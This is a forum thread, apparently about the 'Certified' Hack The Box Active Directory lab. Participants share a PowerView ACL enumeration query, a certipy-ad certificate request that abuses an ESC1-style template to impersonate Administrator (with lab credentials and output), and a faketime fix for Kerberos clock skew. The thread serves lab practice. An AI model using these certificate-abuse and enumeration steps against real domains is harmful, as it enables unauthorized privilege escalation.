Official Certified Discussion

I am at the same spot now as well. Just got user flag late last night.

the user CA_… has the permission to exploit ec9 but there is no one he has generic write over running Get-DomainObjectAcl -LDAPFilter “(&(objectClass=user)(objectCategory=person))” -ResolveGUIDs | ? {($.ActiveDirectoryRights -contains “GenericAll” -or $.ActiveDirectoryRights -contains “GenericWrite”) -and $_.SecurityIdentifier -eq $CA_Operator.objectsid}
comes out empty, can someone help

Summary

certipy-ad req -u ‘CA_operator@certified.htb’ -p ‘Mynewpassword2’ -dc-ip 10.10.11.41 -ca certified-DC01-CA -template CertifiedAuthentication -upn Administrator@certified.htb
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[] Requesting certificate via RPC
[
] Successfully requested certificate
[] Request ID is 22
[
] Got certificate with UPN ‘ca_operator@certified.htb’
[] Certificate has no object SID
[
] Saved certificate and private key to ‘ca_operator.pfx’
im not getting the Administrator pfx someone help im lost this template fits all the criteria for esc1

As I cannot post links on the forum unfortunately… maybe try to google: certipy pentest tutorial.
Hope that helps.

Good luck!

I ended up figuring it out you can use another user to give that user the privilege of admin.

faketime ‘now + 7 hours’
Worked really well, would recommend 10/10.

Pwned! just follow the attack path.

This Box is so much fun and good AD practice. However i kept having this error " KRB_AP_ERR_SKEW(Clock skew too great)" which was support annoying. Despite using ntpdate to fix it, the tme kept changing for some reason.

For anyone facing the same issue, look at the code again. Understand it and you will feel dumb like me…

Thank you very much, I was trying all the above solutions without success but this finally worked. Thanks!!

I have the same issue. Were you able to fix it?